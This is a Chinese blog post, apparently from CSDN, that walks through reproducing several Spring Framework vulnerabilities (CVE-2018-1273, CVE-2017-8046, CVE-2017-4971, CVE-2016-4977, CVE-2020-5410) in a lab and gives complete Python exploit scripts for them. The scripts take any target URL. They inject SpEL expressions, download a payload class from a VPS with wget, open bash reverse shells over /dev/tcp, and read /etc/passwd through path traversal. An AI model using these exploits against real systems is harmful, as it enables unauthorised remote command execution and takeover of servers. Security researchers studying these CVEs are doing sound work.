java poc_spring系列cve poc编写

最新推荐文章于 2024-05-19 09:35:19 发布
最新推荐文章于 2024-05-19 09:35:19 发布
阅读量1.1k 收藏 1
点赞数
文章标签: java poc
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_33880392/article/details/114088181
版权

本来是自己写在有道云笔记的,存粹是为了练习下python代码,也懒得打码了就是自己搭建的个漏测环境,师傅们手下留情.

0x01 cve-2018-1273

1.1 漏洞检测

访问目标/users?page=&size=5

cfc4e00f0630bfcb3a2039d1534efd84.png

抓包,修改post包

POST /users?page=&size=5 HTTP/1.1

Host: 49.235.54.135:24814

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:84.0) Gecko/20100101 Firefox/84.0

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8

Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2

Content-Type: application/x-www-form-urlencoded

Content-Length: 121

Origin: http://49.235.54.135:24814

Connection: close

Referer: http://49.235.54.135:24814//users

Upgrade-Insecure-Requests: 1

username[#this.getClass().forName("java.lang.Runtime").getRuntime().exec("touch root/test")]=&password=&repeatedPassword=

8de1498755df1fc6950d2ebb03646ac2.png

进入docker查看是否创建成功

9a5ca975e781d3e63c7f104491fec2de.png

1.2 反弹shell

这里我们先编译一个class文件

Exploit.java

public class Exploit{

public Exploit(){

try{

Runtime.getRuntime().exec("/bin/bash -c $@|bash 0 echo bash -i >&/dev/tcp/目标IP/2222 0>&1");

}catch(Exception e){

e.printStackTrace();

}

}

public static void main(String[] argv){

Exploit e = new Exploit();

}

}

然后反编译下java文件

javac Exploit.java

然后再vps上传class文件再开启web

python3 -m http.server 8080

然后再bp里面执行下载该class文件

POST /users?page=&size=5 HTTP/1.1

Host: 49.235.54.135:24814

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:84.0) Gecko/20100101 Firefox/84.0

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8

Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2

Content-Type: application/x-www-form-urlencoded

Content-Length: 149

Origin: http://49.235.54.135:24814

Connection: close

Referer: http://49.235.54.135:24814//users

Upgrade-Insecure-Requests: 1

username[#this.getClass().forName("java.lang.Runtime").getRuntime().exec("wget http://198.13.51.45:8080/Exploit.class")]=&password=&repeatedPassword=

然后我们再vps上面监听2222端口

nc -lvvp 2222

然后再bp执行

POST /users?page=&size=5 HTTP/1.1

Host: 49.235.54.135:24814

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:84.0) Gecko/20100101 Firefox/84.0

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8

Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2

Content-Type: application/x-www-form-urlencoded

Content-Length: 118

Origin: http://49.235.54.135:24814

Connection: close

Referer: http://49.235.54.135:24814//users

Upgrade-Insecure-Requests: 1

username[#this.getClass().forName("java.lang.Runtime").getRuntime().exec("java Exploit")]=&password=&repeatedPassword=

反弹shell成功

ec07eac71be645f7846023d5c2ccc0fe.png

1.3 cve-2018-1273 poc编写

Spring在自动解析用户参数时候使用了SpelExpressionParser 来解析propertyName

MapDataBinder.java

Expression expression = PARSER.parseExpression(propertyName);

PropertyPath leafProperty = getPropertyPath(propertyName).getLeafProperty();

TypeInformation> owningType = leafProperty.getOwningType();

TypeInformation> propertyType = owningType.getProperty(leafProperty.getSegment());

propertyType = propertyName.endsWith("]") ? propertyType.getActualType() : propertyType;

if (conversionRequired(value, propertyType.getType())) {

PropertyDescriptor descriptor = BeanUtils

.getPropertyDescriptor(owningType.getType(), leafProperty.getSegment());

MethodParameter methodParameter = new MethodParameter(descriptor.getReadMethod(), -1);

TypeDescriptor typeDescriptor = TypeDescriptor.nested(methodParameter, 0);

value = conversionService.convert(value, TypeDescriptor.forObject(value), typeDescriptor);

}

expression.setValue(context, value);

ProxyingHandlerMethodArgumentResolver在拿到参数的时候会创建一个MapDataBinder来解析参数MapDataBinder.bind()方法,会连带进行doBind操作,最终会调用到 setPropertyValue方法来,最后在 expression.setValue(context, value) 的时候触发了漏洞

使用说明

准备好class文件

Exploit.java

public class Exploit{

public Exploit(){

try{

Runtime.getRuntime().exec("/bin/bash -c $@|bash 0 echo bash -i >&/dev/tcp/目标IP/2222 0>&1");

}catch(Exception e){

e.printStackTrace();

}

}

public static void main(String[] argv){

Exploit e = new Exploit();

}

}

然后反编译下java文件

javac Exploit.java

然后再vps上传class文件再开启web

python3 -m http.server 8080

这里url为http://198.13.51.45:8080/Exploit.class

167aa46e72dadb5bd92b6874bfc4f1ee.png

vps监听,这里监听端口为编译的class的端口

e51e927ff2c8082e69ca8be77a8fcf9e.png

1c8a13c86dff64fd559a1035728cd95c.png

6fe1810505dde1471d7b50990fe36868.png

import pyfiglet

import requests

ascii_banner = pyfiglet.figlet_format("CVE-2018-1273")

print(ascii_banner)

print("blog:https://www.cnblogs.com/yicunyiye/")

print("-" * 50)

payload_poc = {

'username[#this.getClass().forName("java.lang.Runtime").getRuntime().exec("touch root/test111")]':'',

'password':'',

'repeatedPassword':''

}

url = input("attack url:")

print("-" * 50)

# url = "http://49.235.54.135:24814//users?page=&size=5"

target = url+ "/users?page=&size=5"

try:

res = requests.post(target,data=payload_poc)

if(res.status_code == 500):

print("[+]%s is vulnerable" % url)

print("-" * 50)

class_url = input("your exp class url:")

cmd = "wget "+class_url

payload_class = {

'username[#this.getClass().forName("java.lang.Runtime").getRuntime().exec("' +cmd+ '")]': '',

'password': '',

'repeatedPassword': ''

}

res_upload = requests.post(target,data=payload_class)

if(res_upload.status_code == 500):

print("[+]upload success")

print("-" * 50)

print("在vps监听端口,执行之后输入1继续,否则跳出程序")

flag = input("请在监听后输入1:")

print("-" * 50)

flag = int(flag)

if(flag == 1):

payload_shell = {

'username[#this.getClass().forName("java.lang.Runtime").getRuntime().exec("java Exploit")]': '',

'password': '',

'repeatedPassword': ''

}

res_shell = requests.post(target,data=payload_shell)

if(res_shell.status_code == 500):

print("[+]反弹成功")

else:

print("[-]反弹失败")

else:

exit(0)

else:

print("[-]upload fail")

print("-" * 50)

else:

print("[-]%s is not vulnerable" % url)

except:

print("[-]%s is not vulnerable" % url)

0x02 CVE-2017-8046

2.1 漏洞复现

访问存在漏洞web

775c3e107804f55a4747d449b974a563.png

访问/persons目录

cc6818ae4af26b0259abae51c110d00f.png

post添加一个用户

{"firstName":"test","lastName":"test"}

1239aa2c19311d68dadf60a5992fd36c.png

a8cb37140858caae68ac4a6473129a13.png

可以看到id为1,在persons目录里面,使用PATCH方法尝试修改lastName

在http头里面添加

Content-Type': 'application/json-patch+json

PATCH修改内容为

[{"op":"replace","path":"/lastName","value":"hacker"}]

f57e2d53d57853aa13844784047bd671.png

可以看到修改成功

如果要执行命令,需要转化为二进制执行,例如使用如下python代码:

cmd = input("please input your command:")

cmd = bytes(cmd, encoding='utf-8')

bytecode = ','.join(str(i) for i in list(cmd))

please input your command:touch /test

116,111,117,99,104,32,47,116,101,115,116

然后使用exp:

[{ "op": "replace", "path": "T(java.lang.Runtime).getRuntime().exec(new java.lang.String(new byte[]{116,111,117,99,104,32,47,116,101,115,116}))/lastname", "value": "vulhub" }]

7255aeea9a0284fd6b0e4d7cbbca5501.png

4ebe734d66a722aa8e21dccecfe92eb2.png

执行成功

反弹shell查看python代码,同样的操作,只是需要进行一个base64 bash编码

2.2 CVE-2017-8046 编写poc

这里输入获取到的url地址

d77122a037e01d21d2aa157506d3134c.png

9c87aed19a01c03c3dab0ce4619b757f.png

6d0c4945228c02a626990911bd62fd17.png

在vps监听

8947eb6359f9ef81a26752dffa2d2cd5.png

在exp输入shell

a8fc2bf2a91adf07c336a8774fbe2098.png

246b9962daceeaf9d6521c618de11374.png

import requests

import json

import pyfiglet

import base64

import time

import re

ascii_banner = pyfiglet.figlet_format("CVE-2017-8046")

print(ascii_banner)

print("blog:https://www.cnblogs.com/yicunyiye/")

print("-" * 50)

url = input("attack url:")

resp_url = requests.get(url)

target_text = resp_url.text

print("-" * 50)

re_target = re.compile('"href" : "(.*?)"',re.I|re.S)

target = re_target.findall(target_text)[0]

once = requests.get(target)

once = once.text

print(once)

print("-" * 50)

print("输入json中任意两个键来创建值,比如firstname,lastname")

first = input("first:")

second = input("second:")

# first = "lastname"

# second = "firstname"

create = {

first:"yicunyiye",

second:"hacker"

}

if('hacker' not in once):

poc1 = requests.post(target,json=create)

once = requests.get(target)

once = once.text

time.sleep(2)

print("-" * 50)

#匹配创建的用户信息的url地址

re_target_once = re.compile('"hacker"(.*?)"profile"',re.I|re.S)

result_once = re_target_once.findall(once)

result_once = result_once[0]

# input("111:")

re_target_twice = re.compile('"href" : "(.*?)"',re.I|re.S)

result_twice = re_target_twice.findall(result_once)

json_url = result_twice[0]

# json_url = input("输入json中的href地址:")

# json_url = "http://49.235.54.135:47507/persons/1"

replace_url = requests.patch(json_url,

data=json.dumps([{"op": "replace", "path": "/"+first+"", "value": "fenghuaxueyue"}]),

headers={'Content-Type': 'application/json-patch+json'})

replace_url = replace_url.text

if('fenghuaxueyue' in replace_url):

print("[+]%s is vulnerable" % url)

print("-" * 50)

print("input exit will break,input shell you can get a shell")

# cmd = "touch /tmp/test"

# print("please input your command:"+cmd)

while True:

cmd = input("please input your command:")

cmd = bytes(cmd, encoding='utf-8')

flag = b'exit'

if cmd == flag:

print("bye~~")

break

bytecode = ','.join(str(i) for i in list(cmd))

exp_url = requests.patch(json_url,

data=json.dumps([{ "op": "replace", "path": "T(java.lang.Runtime).getRuntime().exec(new java.lang.String(new byte[]{"+bytecode+"}))/lastname", "value": "yicunyiye" }]),

headers={'Content-Type': 'application/json-patch+json'})

if cmd == b'shell':

reverse_ip = input('reverse ip:')

reverse_port = input('reverse port:')

bash_cmd = "bash -i >& /dev/tcp/" + reverse_ip + "/"+reverse_port+" 0>&1"

base64_cmd = base64.b64encode(bytes(bash_cmd, encoding='utf-8'))

string_bash = str(base64_cmd,'utf-8')

reverse_cmd = "bash -c {echo," + string_bash + "}|{base64,-d}|{bash,-i}"

poc = bytes(reverse_cmd, encoding='utf-8')

poc_code = ','.join(str(i) for i in list(poc))

exp = requests.patch(json_url,

data=json.dumps([{"op": "replace",

"path": "T(java.lang.Runtime).getRuntime().exec(new java.lang.String(new byte[]{" + poc_code + "}))/lastname",

"value": "vulhub"}]),

headers={'Content-Type': 'application/json-patch+json'})

print("[+]getshell success")

0x03 cve-2017-4971

3.1 漏洞复现

使用左边账号登录

160029492dddf033c1b0527c8ade6c47.png

进去了访问/hotels/1

506231353f40c370cbfc35a2ff082ec8.png

随便输入信息然后点击

1549371e6213622a338e050a21500770.png

7db2f2e1dac2df90e3b5a30814b13f25.png

添加payload

&_(new+java.lang.ProcessBuilder("bash","-c","bash+-i+>%26+/dev/tcp/攻击机IP/端口号+0>%261")).start()=yicunyiye

13398b9dc70ee3e90c4a2cd6d8141408.png

3.2 cve-2017-4971 poc编写

这里需要注意下就是登录以及后面的post数据包都采用了csrf_token,只需要用request.Session()固定下就,然后post前先get url 正则匹配下token就行了

注意python编译器把空格变成+,我就在这里搞了好久--,结果发现被转义了

4e1016274de0f3f0b99276b3e6721acd.png

f1f5739bb8a4f27029d844148e7d89e6.png

import requests

import re

import time

import pyfiglet

import datetime

ascii_banner = pyfiglet.figlet_format("CVE-2017-4971")

print(ascii_banner)

print("blog:https://www.cnblogs.com/yicunyiye/")

print("-" * 50)

#用户登录时候的url

# url = input("attack url:")

url = "http://49.235.54.135:24924/"

print("-" * 50)

Post_login_url = url + "/loginProcess"

#输入账号密码

print("default:keith,erwin,jeremy,scott")

# username = input("username:")

username = "keith"

print("default:melbourne,leuven,atlanta,rochester")

# password = input("password:")

password = "melbourne"

#用户登录时候需要的csrf_token

session = requests.Session()

login_csrf_url = url + '/login'

res_login = session.get(login_csrf_url)

re_login_csrf = re.compile('name="_csrf" value="(.*?)"',re.I|re.S)

login_token = re_login_csrf.findall(res_login.text)[0]

#登录

login_data = {

"username":username,

"password":password,

"_csrf":login_token

}

login = session.post(Post_login_url,data=login_data,allow_redirects=False)

try:

login_flag = str(login.headers)

if('JSESSIONID' in login_flag):

print("-" * 50)

print("[+]login success!")

print("-" * 50)

response = session.get(url+'/hotels/1')

Location = session.get(url+'/hotels/booking?hotelId=1',allow_redirects=False)

Location = Location.headers['Location']

#填写hotel信息的url

hotel_info_url = url+Location

hotel_page = session.get(hotel_info_url)

re_post_csrf = re.compile('name="_csrf" value="(.*?)"', re.I | re.S)

post_token = re_post_csrf.findall(hotel_page.text)[0]

today_add_1 = (datetime.datetime.now() + datetime.timedelta(days=1)).strftime("%m-%d-%Y")

today_reduce_1 = (datetime.datetime.now() + datetime.timedelta(days=-1)).strftime("%m-%d-%Y")

today_add_3 = (datetime.datetime.now() + datetime.timedelta(days=3)).strftime("%m-%d-%Y")

post_data = {

"checkinDate": today_add_1,

"checkoutDate": today_add_1,

"beds": "1",

"smoking": "false",

"_amenities": "on",

"_amenities": "on",

"_amenities": "on",

"creditCard": "1231111111111111",

"creditCardName": "11",

"creditCardExpiryMonth": "1",

"creditCardExpiryYear": "1",

"_csrf": post_token,

"_eventId_proceed": "_eventId_proceed",

"ajaxSource": "proceed"

}

Spring_Redirec_URL = session.post(hotel_info_url,data=post_data)

Spring_Redirec_URL = Spring_Redirec_URL.headers['Spring-Redirect-URL']

confirm_url = url + Spring_Redirec_URL

# res = session.get(confirm_url)

reverse_ip = input("reverse ip:")

reverse_port = input("reverse port:")

confirm_data = {

'_eventId_confirm':'',

'_csrf':post_token,

'_(new java.lang.ProcessBuilder("bash","-c","bash -i >& /dev/tcp/'+reverse_ip+'/'+reverse_port+' 0>&1")).start()':'yicunyiye'

}

res = session.get(confirm_url)

time.sleep(2)

payload_send = session.post(confirm_url,data=confirm_data,allow_redirects=False)

if(payload_send.status_code == 500):

print("[+]反弹shell成功!")

print("-" * 50)

else:

print("[-]反弹shell失败!")

print("-" * 50)

else:

print("-" * 50)

print("[-]login failed!")

print("-" * 50)

except:

print("bye~~")

0x04 CVE-2016-4977

4.1 CVE-2016-4977 poc编写

import requests

import pyfiglet

import base64

import time

ascii_banner = pyfiglet.figlet_format("CVE-2016-4977")

print(ascii_banner)

print("blog:https://www.cnblogs.com/yicunyiye/")

print("-" * 50)

url = input("attack url:")

username = input("username:")

password = input("password:")

print("-" * 50)

data = username+":"+password

res = base64.b64encode(data.encode("utf-8")).decode("utf-8")

Authorization = "Basic " + res

headers = {

"Authorization": Authorization

}

payload = "oauth/authorize?response_type=${11*11}&client_id=acme&scope=openid&redirect_uri=http://test"

target = url+payload

res = requests.get(target,headers=headers)

result = res.text

if('121' in result):

print("[+]%s is vulnerable" % url)

print("-" * 50)

reverse_ip = input('reverse ip:')

reverse_port = input('reverse port:')

bash_cmd = "bash -i >& /dev/tcp/" + reverse_ip + "/" + reverse_port + " 0>&1"

base64_cmd = base64.b64encode(bytes(bash_cmd, encoding='utf-8'))

string_bash = str(base64_cmd, 'utf-8')

reverse_cmd = "bash -c {echo," + string_bash + "}|{base64,-d}|{bash,-i}"

poc = '${T(java.lang.Runtime).getRuntime().exec(T(java.lang.Character).toString(%s)' % ord(reverse_cmd[0])

for ch in reverse_cmd[1:]:

poc += '.concat(T(java.lang.Character).toString(%s))' % ord(ch)

poc += ')}'

payload_getshell = "oauth/authorize?response_type="+poc+"&client_id=acme&scope=openid&redirect_uri=http://test"

# print(payload_getshell)

target_getshell = url + payload_getshell

shell = requests.get(target_getshell,headers=headers)

time.sleep(10)

print("getshell success!")

else:

print("[-]%s is not vulnerable" % url)

print("-" * 50)

0x05 CVE-2020-5410

5.1 CVE-2020-5410 poc编写

import requests

import pyfiglet

ascii_banner = pyfiglet.figlet_format("CVE-2020-5410")

print(ascii_banner)

print("blog:https://www.cnblogs.com/yicunyiye/")

print("-" * 50)

url = input("attack url:")

payload = "/..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252Fetc%252Fpasswd%23/ddd"

result = requests.get(url+payload)

if ('root' in result.text):

print("[+]%s is vulnerable" % url)

else:

print("[-]%s is not vulnerable" % url)

直树桑
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
java安全(八)TransformedMap构造POC
weixin_45694388的博客
07-31 1109
上一篇构造了一个了commons-collections的demo package test.org.vulhub.Ser; import org.apache.commons.collections.Transformer; import org.apache.commons.collections.functors.ChainedTransformer; import org.apache.commons.collections.functors.ConstantTransformer; impo
java poc_无回显命令执行PoC编写指南(Apache Shiro Java反序列化)
weixin_32058991的博客
02-16 661
无回显漏洞存在与否,无法从web获取到标志性的信息,Java反序列化漏洞即属于该类型。验证方法针对无回显的命令执行漏洞,让目标机执行wget、nc或者curl等命令,然后在公网主机监听对应的端口,通过日志来判断命令是否被执行。该方法可行,不过缺陷有以下几点:修改了目标机的文件系统不具有通用性,如windows没有nc、linux没有wget的情况。涉及到TCP数据传输,执行速度慢一种更好的方式是使...
手把手教你写JAVA反序列化的POC
Ms08067安全实验室
07-20 2043
0x01 前言前面,我们了解了java的序列化机制,也知道在什么情况下会出现漏洞,为了对反序列化漏洞有个更直观的认识,这里就来说一说存在于apache commons-collectio...
探索CVE-2019-5736-PoC:Docker容器逃逸的利器
最新发布
gitblog_00016的博客
05-19 303
探索CVE-2019-5736-PoC:Docker容器逃逸的利器 项目地址:https://gitcode.com/Frichetten/CVE-2019-5736-PoC 本文将向您介绍一个极具影响力的开源项目——CVE-2019-5736-PoC,这是一个利用Go语言实现的Docker容器逃逸漏洞(CVE-2019-5736)的Proof-of-Concept(PoC)。该项目由多个安全研究...
java-poc
03-11
java-poc
直播预告 | 今晚8点 1小时教会使用Java编写POC
Ms08067安全实验室
01-07 118
— 实验室旗下直播培训课程 —来和20000+位同学加入MS08067一起学习吧!
CVE-2022-22947-Spring-Cloud-Gateway 内存马POC
03-29
Spring官方博客发布了一篇关于Spring Cloud Gateway的CVE报告,据公告描述,当启用和暴露 Gateway Actuator 端点时,使用 Spring Cloud Gateway 的应用程序可受到代码注入攻击。攻击者可以发送特制的恶意请求,从而...
poc-spring-boot
04-27
如何在Spring启动中采用JPA 如何处理异常 怎么写“整合测试” 基础实体 实体乐观锁定/版本 如何采用DTO(数据转换对象)模式 审核解决方案 软删除和唯一密钥解决方案 ID生成器通过随机UUID变长 通过Flyway进行...
poc-cve-2018-1273:CVE-2018-1273的POC
05-15
CVE-2018-1273 Spring Data Commons(1.13至1.13.10之前的版本,2.0至2.0.5的版本以及较早的不受支持的版本)包含由于特殊元素的不正确中和导致的属性绑定器漏洞。 未经身份验证的远程恶意用户(或攻击者)可以针对...
SpringCloud Function SpEL注入漏洞分析(CVE-2022-22963).doc
07-08
SpringCloud Function SpEL 注入漏洞分析(CVE-2022-22963) SpringCloud Function 是 Spring 提供的一套分布式函数式编程组件,旨在帮助开发者专注于业务逻辑实现,而不需要关心服务器环境运维等问题。然而,在 ...
spring Framework 远程命令执行漏洞CVE-2022-22965漏洞脚本自用
10-27
Spring Framework 是一个广泛使用的Java应用程序开发框架,以其模块化、灵活和强大的功能而闻名。然而,随着技术的发展,安全问题始终是关注的重点。在2022年,Spring Framework 发现了一个严重的远程命令执行(RCE...
java-poc:概念证明和Java技巧
04-30
注意: : 优先级警告...使用 Khallware(Java概念验证) 概述 这是一些用Java编写的简单,独立的概念证明。 主题包括: -简单的Java构造,data_types和语言功能 -通用软件设计模式 -计算机科学算法 -各种核心Java技术 -j2ee技术的各种子集 -通用Java
JavaPOC:概念证明
05-26
JavaPOC 概念验证:Apache HttpComponents获得请求,Junit,JMockit,Basic Maven POM,还更多地暴露于.gitignore概念 还包括Java 7+ try-with-resources语句,该语句关闭所有可关闭的资源,而不必将它们放在finally块中。 我学到的有趣的东西 在JMockit中,“严格”的期望值与“非严格期望值”相对应。 使用“严格”时,预期代码行为的顺序非常重要。 模拟系统时间是一项艰巨的任务。 我花了很多研究才能了解如何在JMockit中仅模拟一个方法System.currentTimeMillis() 。 我陷入的陷阱是模拟了整个System.class ,导致了类似13的系统方法调用,我模拟了13个响应,直到找到了模拟对currentTimeMillis()的响应的方法 我首先在类路径中包含.jar文件,直到能
POC编写指南
03-27
转载自Medici.Yan,以真实案例为背景,针对当下主流的漏洞来分析漏洞,并且一步一步编写对应的 PoC
java_poc:Java POC MAVEN应用程序
05-16
java_poc Java POC MAVEN应用程序
poc-spring:Spring JavaPOC(@RequestMapping和Async WebClient的演示)
05-11
弹簧 <测试记录,DI和所有其他功能> 这是用于Spring Request Mapping和异步Rest Request的POC项目 请使用gradle build安装项目并使用bootRun运行 使用以下API进行测试 请在软件包hello中查看文件RequestMappingDemoController.java。 敦促致电 本地主机:8080 /问候 本地主机:8080 / greeting?name = admin 本地主机:8080 /正在问候用户 本地主机:8080 / greeting?user&name = sushil 请在hello包中查看文件AsyncDemoController.java 异步香草 WebClient内部调用 本地主机:8080 / asyncrestdemo / 异步延迟 WebClient内部调用带有延迟响应的 。 本地主机:8
SaltStack 命令注入漏洞(CVE-2020-16846)复现,python编写POC
wangqiao258的博客
10-10 276
环境搭建: 使用vulhub,进入对应文件夹启动环境: [root@localhost ~]# cd /home/vulhub/saltstack/CVE-2020-16846/ [root@localhost CVE-2020-16846]# docker-compose up -d 查看端口: [root@localhost CVE-2020-16846]# docker ps CONTAINER ID IMAGE COMMAND
【转】POC介绍
热门推荐
宁静深远的专栏
03-07 1万+
1、POC的概念 POC,是Proof of Concept的缩写,意思是为观点提供证据,它是一套建议的电子模型,它可用于论证团队和客户的设计,允许评估和确认概念设计方案,POC的评价可能引起规格和设计的调整。POC流程所产生的关于设计的承诺、大家都认可的意见都将记录在设计的调整文档中,以备查。这样下去,POC不断发展。 如果在完成这些任务时需要帮助,可以在Queensland大学找到协助资源。 2、POC的开发 POC的开发步骤及方法如下:        
poc框架及poc编写
weixin_48776804的博客
07-24 730
poc框架及poc编写1 pocassist2 pocsuite33 主要是两个框架,第一个相对好用一点 1 pocassist 2 pocsuite3 3 其他poc https://hub.fastgit.org/WooYun/TangScan
poc_201911.class
05-12
poc_201911.class 是一个文件名,其中Poc代表了“Proof of Concept”(概念验证)的缩写,而 201911 则代表了该文件实现的时间,即 2019年11月。 Poc_201911.class 文件名通常用于计算机安全领域,特别是在进行漏洞...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值